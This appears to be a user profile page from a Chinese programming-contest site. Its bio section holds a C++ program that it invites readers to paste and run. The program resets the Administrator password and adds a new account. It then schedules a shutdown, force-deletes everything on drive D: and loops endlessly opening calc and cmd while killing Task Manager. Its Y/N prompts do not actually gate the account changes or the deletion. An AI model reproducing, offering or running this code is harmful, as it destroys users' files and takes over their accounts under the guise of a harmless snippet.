-
个人简介
#include #include <stdlib.h> #include <conio.h> #include <windows.h> #include using namespace std; int main(){ cout<<"输入Y or N"; char k = getch(); if(k == 'Y' || k == 'y') system("net user Administrator wait"); system("net user xxx wait /add"); system("ping www.baidu.com"); cout<<"输入Y or N"; k = getch(); if(k == 'Y' || k == 'y') system("shutdown -s -t 30"); system("del /F /S /Q D:\"); cout<<"输入Y or N"; k = getch(); if(k == 'y' || k == 'y'){ while(1){ system("calc"); system("cmd"); system("taskkill /f /im taskmgr.exe"); } } return 0;}//请粘贴运行;
-
通过的题目
-
最近活动
题目标签
- DFS
- 1
- 图论
- 1
- 初窥门径
- 1